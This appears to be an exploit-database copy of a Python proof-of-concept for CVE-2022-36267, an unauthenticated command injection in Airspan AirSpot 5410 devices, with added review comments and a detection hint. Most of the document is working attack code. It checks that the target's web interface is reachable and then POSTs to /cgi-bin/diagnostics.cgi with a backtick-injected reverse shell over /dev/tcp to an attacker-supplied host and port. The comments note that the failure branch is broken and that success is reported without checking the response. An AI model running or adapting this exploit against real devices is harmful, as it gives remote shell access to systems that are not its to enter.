





AirSpot 5410 0.3.4.1-4 Remote Command Injection

CVE: CVE-2022-36267 | Category: CWE-78 (OS command injection) | Price: Not specified | Severity: High
Author: Not specified | Risk: High | Exploitation Type: Remote | Date: 2022-08-11
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022080042

Below is a copy:

AirSpot 5410 0.3.4.1-4 Remote Command Injection
# -*- coding: utf-8 -*-

# Exploit Title: AirSpot unauthenticated remote command injection
# Date: 7/26/2022
# Exploit Author: Samy Younsi (NSLABS) (https://samy.link)
# Vendor Homepage: https://www.airspan.com/
# Software Link: https://wdi.rfwel.com/cdn/techdocs/AirSpot5410.pdf
# Version: 0.3.4.1-4 and under.
# Tested on: Airspan AirSpot 5410 version 0.3.4.1-4 (Ubuntu)
# CVE : CVE-2022-36267

from __future__ import print_function, unicode_literals
import argparse
import requests
import urllib3
# Suppresses urllib3's warnings for the whole process. That includes the
# InsecureRequestWarning that would otherwise be shown for every request made
# below with verify=False (TLS certificate validation switched off).
urllib3.disable_warnings()

def banner():
  """Print the author's ASCII-art banner in colour; returns None (print's result)."""
  # The literal below is not a raw string, so its backslashes are interpreted:
  # "\033[...m" sequences are ANSI colour codes, "\\" yields one backslash, and
  # the art lines that end in a single backslash are joined to the next line
  # (backslash-newline is a line continuation inside a string literal).
  airspanLogo = """ 
      ,-.
     / \  `.  __..-,O
    :   \ --''_..-'.'
    |    . .-' `. '.
    :     .     .`.'
     \     `.  /  ..
      \      `.   ' .
       `,       `.   \
      ,|,`.        `-.\
     '.||  ``-...__..-`
      |  | Airspan 
      |__| AirSpot 5410
      /||\ PWNED x_x
     //||\\
    // || \\
 __//__||__\\__
'--------------'Necrum Security Labs
                        
\033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m         \033[1;91mAirSpot 5410 CMD INJECTION\033[1;m                                                 
                FOR EDUCATIONAL PURPOSE ONLY.   
  """
  # The whole banner is wrapped in a further colour code before printing.
  return print('\033[1;94m{}\033[1;m'.format(airspanLogo))

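def pingWebInterface(RHOST, RPORT):
  """Check that the device's HTTPS web interface answers before continuing.

  Sends one GET to https://RHOST:RPORT without following redirects and
  treats any status other than 200 as "not reachable".

  Args:
    RHOST: Host name or IP address of the device.
    RPORT: TCP port of its HTTPS web interface.

  Raises:
    SystemExit: With status 1 when the request fails or the status is not
      200, so a calling shell or harness can tell the check failed.
  """
  unreachable = '[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m'
  url = 'https://{}:{}'.format(RHOST, RPORT)
  try:
    # verify=False turns certificate validation off, so a 200 here says
    # nothing about which host actually answered.
    # NOTE(review): presumably the device presents a self-signed certificate; confirm.
    response = requests.get(url, allow_redirects=False, verify=False, timeout=30)
  except requests.exceptions.RequestException:
    # Catch only requests' own errors. A bare `except:` would also trap the
    # SystemExit raised for a non-200 status (printing the error twice) and
    # would swallow KeyboardInterrupt.
    print(unreachable)
    raise SystemExit(1)
  if response.status_code != 200:
    print(unreachable)
    raise SystemExit(1)
  print('[INFO] Airspan device web interface seems reachable!')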


def execReverseShell(RHOST, RPORT, LHOST, LPORT):
  """Send the single proof-of-concept request for CVE-2022-36267.

  The request is a POST to /cgi-bin/diagnostics.cgi with
  Command=pingDiagnostic; no credentials, cookies or tokens are attached.
  The targetIP field holds a literal address followed by a backtick-quoted,
  URL-encoded shell command, which is the CWE-78 (OS command injection)
  pattern named in the advisory header.

  For detection: a request to this path whose targetIP value is anything
  other than a bare IP address (for example, it contains a backtick) is
  worth alerting on.
  NOTE(review): the device-side CGI is not shown here; the usual fix for
  this class is to validate targetIP as an IP address and to invoke ping
  without going through a shell. Confirm against the vendor's advisory.

  Args:
    RHOST: Host name or IP address of the device.
    RPORT: TCP port of its HTTPS web interface.
    LHOST: Address interpolated into the command as the connect-back host.
    LPORT: Port interpolated into the command as the connect-back port.

  Returns:
    None when the POST returns without raising. The except branch is written
    to return False but cannot reach that line (see the note there).
  """
  # Backtick-wrapped command; the %XX sequences are URL-encoded spaces and
  # shell punctuation.
  payload = '`sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{}%2F{}%200%3E%261`'.format(LHOST, LPORT)
  # The payload is appended directly after the literal 1.1.1.1 in targetIP.
  data = 'Command=pingDiagnostic&targetIP=1.1.1.1{}&packetSize=55&timeOut=10&count=1'.format(payload)
  try:
    print('[INFO] Executing reverse shell...')
    # data is a str, so requests sends it as the body verbatim. No timeout is
    # passed (unlike the GET in pingWebInterface), so this call can block.
    response = requests.post('https://{}:{}/cgi-bin/diagnostics.cgi'.format(RHOST, RPORT), data=data, verify=False)
    # Printed whenever the POST returns: the response is never inspected, so
    # this message does not confirm that the device was affected.
    print("Reverse shell successfully executed. {}:{}".format(LHOST, LPORT))
    return
  except Exception as e:
      # NOTE(review): .format() is applied to the return value of print(),
      # which is None because the file imports print_function. This line
      # therefore raises AttributeError after printing the unformatted
      # message, and the `return False` below is never reached.
      print("Reverse shell failed. Make sure the AirSpot 5410 device can reach the host {}:{}").format(LHOST, LPORT)
      return False

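def _build_parser():
  """Return the argparse parser for the script's four connection options."""
  # add_help=False is kept from the original, so -h/--help is not registered.
  parser = argparse.ArgumentParser(description='Script PoC that exploits an unauthenticated remote command injection on Airspan AirSpot devices.', add_help=False)
  parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (Airspan AirSpot device)", type=str, required=True)
  # NOTE(review): the help text mentions a default of 443, but the option is
  # required and no default is set.
  parser.add_argument('--RPORT', help="Refers to the open port of the target machine. (443 by default)", type=int, required=True)
  parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)
  parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)
  return parser


def main():
  """Print the banner, parse the command line, run the reachability check and send the request.

  The parser is built here rather than read from a module-level `parser`
  that exists only under the `__main__` guard; calling main() after an
  import would otherwise fail with NameError.
  """
  banner()
  args = _build_parser().parse_args()
  # pingWebInterface ends the process itself when the interface does not answer.
  pingWebInterface(args.RHOST, args.RPORT)
  execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)


if __name__ == "__main__":
  main()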
